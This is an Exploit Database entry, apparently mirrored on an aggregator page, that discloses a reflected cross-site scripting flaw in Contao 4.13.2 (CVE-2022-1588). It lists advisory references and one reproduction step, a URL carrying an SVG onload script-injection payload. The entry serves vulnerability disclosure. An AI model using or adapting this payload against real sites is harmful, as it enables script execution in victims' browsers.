Contao 4.13.2 – Cross-Site Scripting (XSS)

• Exploit Database
• 30 阅读

• 作者： Chetanya Sharma
  日期： 2022-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50945/

• # Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
  # Google Dork: NA
  # Date: 04/28/2022
  # Exploit Author: Chetanya Sharma @AggressiveUser
  # Vendor Homepage: https://contao.org/en/
  # Software Link: https://github.com/contao/contao/releases/tag/4.13.2
  # Version: [ 4.13.2 ] 
  # Tested on: [KALI OS]
  # CVE : CVE-2022-1588
  # References: 
  - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
  - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
  - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
  ---------------
  
  Steps to reproduce:
  Navigate to the below URL
  URL: https://localhost/contao/"><svg//onload=alert(112233)>